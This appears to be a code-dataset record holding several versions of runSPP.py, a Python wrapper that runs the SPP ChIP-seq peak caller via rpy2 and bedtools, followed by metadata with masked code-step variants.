filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
if __name__ == '__main__':
sys.exit(main(sys.argv))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
SPPPeak = collections.namedtuple('SPPPeak',
'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'
)
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
if __name__ == '__main__':
sys.exit(main(sys.argv))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
import sys
import subprocess
import collections
from cgatcore import experiment as E
from rpy2.robjects import r as R
def bamToBed(infile, outfile):
"""convert bam to bed with bedtools."""
statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)
if retcode < 0:
raise OSError('Child was terminated by signal %i: \n%s\n' % (-
retcode, statement))
return outfile
SPPPeak = collections.namedtuple('SPPPeak',
'contig unrefined_start unrefined_end strand posterior summit height refined_start refined_end median fdr'
)
def iteratePeaks(infile):
"""iterate of zinba peaks in infile."""
for line in infile:
if line.startswith('#'):
continue
if line.startswith('PEAKID\tChrom'):
continue
if line.startswith('\n'):
continue
data = line[:-1].split('\t')
if len(data) != 12:
raise ValueError('could not parse line %s' % line)
data[2] = max(int(data[2]) - 1, 0)
data[3] = int(data[3])
data[5] = float(data[5])
data[6] = max(int(data[6]) - 1, 0)
data[7] = int(data[7])
data[8] = max(int(data[8]) - 1, 0)
data[9] = int(data[9])
data[10] = int(data[10])
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[
'__doc__'])
parser.add_option('-f', '--input-format', dest='input_format', type=
'choice', choices=('bam',), help=
'input file format [default=%default].')
parser.add_option('-w', '--window-size', dest='window_size', type='int',
help='window size [default=%default].')
parser.add_option('-c', '--control-filename', dest='control_filename',
type='string', help=
'filename of input/control data in bed format [default=%default].')
parser.add_option('-t', '--threads', dest='threads', type='int', help=
'number of threads to use [default=%default].')
parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=
'float', help='fdr threshold [default=%default].')
parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=
'float', help='z threshold [default=%default].')
parser.add_option('--bin', dest='bin', type='int', help=
'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'
)
parser.add_option('--spp-srange-min', dest='srange_min', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.add_option('--spp-srange-max', dest='srange_max', type='float',
help=
'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'
)
parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,
window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,
z_threshold=3)
options, args = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
'please specify a filename with sample data and an output file')
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
R.library('spp')
R.library('snow')
E.info('reading data')
R("chip.data <- read.bam.tags('%s')" % filename_sample)
R("input.data <- read.bam.tags('%s')" % filename_control)
R('cluster = makeCluster( %i )' % options.threads)
E.info('computing binding characteristics')
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R(
"""binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);"""
% locals())
options.stdout.write('shift\t%i\n' % R('binding.characteristics$peak$x')[0]
)
E.info('plot cross correlation profile')
R('pdf(file="%s.crosscorrelation.pdf",width=5,height=5)' % filename_output)
R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')
R("""plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");"""
)
R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')
R('dev.off();')
E.info('selecting informative tags based on the binding characteristics')
R("""chip.data <- select.informative.tags(
chip.data,binding.characteristics);"""
)
R("""input.data <- select.informative.tags(
input.data,binding.characteristics);"""
)
E.info('outputting broad peaks')
window_size, z_threshold = options.window_size, options.z_threshold
R(
"""broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))"""
% locals())
R('write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")' %
filename_output)
R('detection.window.halfsize <- binding.characteristics$whs;')
E.info('determining binding positions using wtd method')
fdr = options.fdr_threshold
R(
"""bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)"""
% locals())
options.stdout.write('detected_peaks\t%i\n' % R(
'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])
R('output.binding.results(bp,"%s.summit.txt");' % filename_output)
R(
"""bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)"""
% locals())
R('write.narrowpeak.binding(bp,"%s.narrowpeak.txt")' % filename_output)
E.stop()
if __name__ == '__main__':
sys.exit(main(sys.argv))
<|reserved_special_token_1|>
'''
runSPP.py - wrap spp peak caller
========================================
:Tags: Python
Purpose
-------
Runs the spp peak caller.
The workflow follows the tutorial at:
http://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html
Usage
-----
Documentation
-------------
Requirements:
* spp >= ?
* snow >= 0.3.13
* bedtools >= 2.21.0
Code
----
'''
import os
import sys
import subprocess
import collections
from cgatcore import experiment as E
from rpy2.robjects import r as R
def bamToBed(infile, outfile):
    '''convert bam to bed with bedtools.

    Arguments
    ---------
    infile : string
        Path of the input BAM file.
    outfile : string
        Path the BED output is redirected to.

    Returns
    -------
    string
        The path of the output file (*outfile*).

    Raises
    ------
    OSError
        If the bedtools child process is terminated by a signal or
        exits with a non-zero status.
    '''
    statement = "bamToBed -i %(infile)s > %(outfile)s" % locals()

    E.debug("executing statement '%s'" % statement)

    retcode = subprocess.call(statement,
                              cwd=os.getcwd(),
                              shell=True)
    if retcode < 0:
        raise OSError("Child was terminated by signal %i: \n%s\n" %
                      (-retcode, statement))
    elif retcode > 0:
        # A non-zero exit status also means the conversion failed;
        # previously this was silently ignored, returning a possibly
        # truncated or empty output file.
        raise OSError("Child exited with non-zero status %i: \n%s\n" %
                      (retcode, statement))
    return outfile
# Record type for a single SPP peak call; fields follow the columns of
# the SPP text output (minus the leading PEAKID column).
SPPPeak = collections.namedtuple(
    "SPPPeak",
    "contig unrefined_start unrefined_end strand "
    "posterior summit height refined_start refined_end median fdr")


def iteratePeaks(infile):
    '''Yield :class:`SPPPeak` records parsed from the lines of *infile*.

    Comment lines (``#``), the column-header row and blank lines are
    skipped.  Start coordinates (columns 2, 6 and 8) are assumed to be
    1-based in the input and are converted to 0-based, clamped at zero.

    Raises
    ------
    ValueError
        If a data line does not contain exactly 12 tab-separated fields.
    '''
    for line in infile:

        # skip comments, the header row and empty lines
        if line.startswith(("#", "PEAKID\tChrom", "\n")):
            continue

        fields = line[:-1].split("\t")
        if len(fields) != 12:
            raise ValueError("could not parse line %s" % line)

        # 1-based start coordinates -> 0-based, clamped at 0
        # (unrefined start, summit, refined start)
        for col in (2, 6, 8):
            fields[col] = max(int(fields[col]) - 1, 0)
        # plain integer columns: unrefined end, height, refined end, median
        for col in (3, 7, 9, 10):
            fields[col] = int(fields[col])
        # floating-point columns: posterior, fdr
        for col in (5, 11):
            fields[col] = float(fields[col])

        # drop the leading PEAKID column
        yield SPPPeak._make(fields[1:])
def main(argv=None):
    """script main.
    parses command line options in sys.argv, unless *argv* is given.

    Expects two positional arguments: a sample BAM file and an output
    file stem.  Runs the SPP peak caller through rpy2, writing a
    cross-correlation PDF plus ``.broadpeak.txt``, ``.summit.txt`` and
    ``.narrowpeak.txt`` files derived from the output stem.
    """
    if not argv:
        argv = sys.argv
    # setup command line parser
    parser = E.OptionParser(version="%prog version: $Id$",
                            usage=globals()["__doc__"])
    parser.add_option("-f", "--input-format", dest="input_format",
                      type="choice",
                      choices=("bam",),
                      help="input file format [default=%default].")
    parser.add_option("-w", "--window-size", dest="window_size", type="int",
                      help="window size [default=%default].")
    parser.add_option("-c", "--control-filename",
                      dest="control_filename",
                      type="string",
                      help="filename of input/control data in "
                      "bed format [default=%default].")
    parser.add_option("-t", "--threads", dest="threads", type="int",
                      help="number of threads to use [default=%default].")
    parser.add_option("-q", "--fdr-threshold",
                      dest="fdr_threshold", type="float",
                      help="fdr threshold [default=%default].")
    parser.add_option("-z", "--spp-z-threshold", dest="z_threshold", type="float",
                      help="z threshold [default=%default].")
    parser.add_option("--bin", dest="bin", type="int",
                      help="bin tags within the specified number "
                      " of basepairs to speed up calculation;"
                      " increasing bin size decreases the accuracy "
                      "of the determined parameters [default=%default]")
    parser.add_option("--spp-srange-min", dest="srange_min", type="float",
                      help="srange gives the possible range for the "
                      " size of the protected region;"
                      " srange should be higher than tag length; "
                      " making the upper boundary too high"
                      " will increase calculation time [%default]")
    parser.add_option("--spp-srange-max", dest="srange_max", type="float",
                      help="srange gives the possible range for the "
                      " size of the protected region;"
                      " srange should be higher than tag length; "
                      " making the upper boundary too high"
                      " will increase calculation time [%default]")
    parser.set_defaults(
        input_format="bam",
        threads=1,
        fdr_threshold=0.05,
        window_size=1000,
        offset=125,
        srange_min=50,
        srange_max=500,
        bin=5,
        z_threshold=3,
    )
    # add common options (-h/--help, ...) and parse command line
    (options, args) = E.start(parser, argv=argv)
    if len(args) != 2:
        raise ValueError(
            "please specify a filename with sample data and an output file")
    filename_sample, filename_output = args[0], args[1]
    # NOTE(review): no default is set for control_filename above, so if -c
    # is omitted this is None and the read.bam.tags('None') call below will
    # fail inside R -- confirm -c is effectively mandatory for callers.
    filename_control = options.control_filename
    # load the required R packages: spp (peak caller) and snow (cluster)
    R.library('spp')
    R.library('snow')
    # read sample and control tags from the BAM files
    E.info("reading data")
    R('''chip.data <- read.bam.tags('%s')''' % filename_sample)
    R('''input.data <- read.bam.tags('%s')''' % filename_control)
    R('''cluster = makeCluster( %i )''' % (options.threads))
    E.info("computing binding characteristics")
    # get binding info from cross-correlation profile
    # srange gives the possible range for the size of the protected region;
    # srange should be higher than tag length; making the upper boundary too
    # high will increase calculation time
    # bin - bin tags within the specified number of basepairs to speed
    # up calculation; increasing bin size decreases the accuracy of
    # the determined parameters
    srange_min, srange_max = options.srange_min, options.srange_max
    bin = options.bin
    R('''binding.characteristics <- get.binding.characteristics(chip.data,
    srange=c(%(srange_min)i,%(srange_max)i),
    bin=%(bin)s,
    cluster=cluster);''' % locals())
    # print out binding peak separation distance
    options.stdout.write(
        "shift\t%i\n" % R('''binding.characteristics$peak$x''')[0])
    ##################################################
    ##################################################
    ##################################################
    E.info("plot cross correlation profile")
    # plot cross-correlation profile
    R('''pdf(file="%s.crosscorrelation.pdf",width=5,height=5)''' %
      filename_output)
    R('''par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')
    R('''plot(binding.characteristics$cross.correlation,
    type='l',
    xlab="strand shift",
    ylab="cross-correlation");''')
    R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')
    R('''dev.off();''')
    E.info("selecting informative tags based on the binding characteristics")
    # select informative tags based on the binding characteristics
    R('''chip.data <- select.informative.tags(
    chip.data,binding.characteristics);''')
    R('''input.data <- select.informative.tags(
    input.data,binding.characteristics);''')
    E.info("outputting broad peaks")
    window_size, z_threshold = options.window_size, options.z_threshold
    R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
    window.size=%(window_size)i,
    z.thr=%(z_threshold)f,
    tag.shift=round(binding.characteristics$peak$x/2))''' % locals())
    # write out in broadPeak format
    R('''write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")''' %
      filename_output)
    # binding detection parameters desired FDR (1%). Alternatively, an
    # E-value can be supplied to the method calls below instead of the
    # fdr parameter the binding.characteristics contains the optimized
    # half-size for binding detection window
    R('''detection.window.halfsize <- binding.characteristics$whs;''')
    # determine binding positions using wtd method
    E.info("determining binding positions using wtd method")
    fdr = options.fdr_threshold
    R('''bp <- find.binding.positions(
    signal.data=chip.data,control.data=input.data,
    fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())
    options.stdout.write("detected_peaks\t%i\n" % R(
        '''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])
    # output detected binding positions
    R('''output.binding.results(bp,"%s.summit.txt");''' % filename_output)
    R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,
    window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())
    # output using narrowPeak format
    R('''write.narrowpeak.binding(bp,"%s.narrowpeak.txt")''' %
      filename_output)
    # write footer and output benchmark information.
    E.stop()
# script entry point: exit with main()'s return value
if __name__ == "__main__":
    sys.exit(main(sys.argv))
|
flexible
|
{
"blob_id": "e886b88a0b7e8c06772fe8a9554cab1bfe9e94a7",
"index": 7208,
"step-1": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold 
[default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross 
correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold 
[default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross 
correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n",
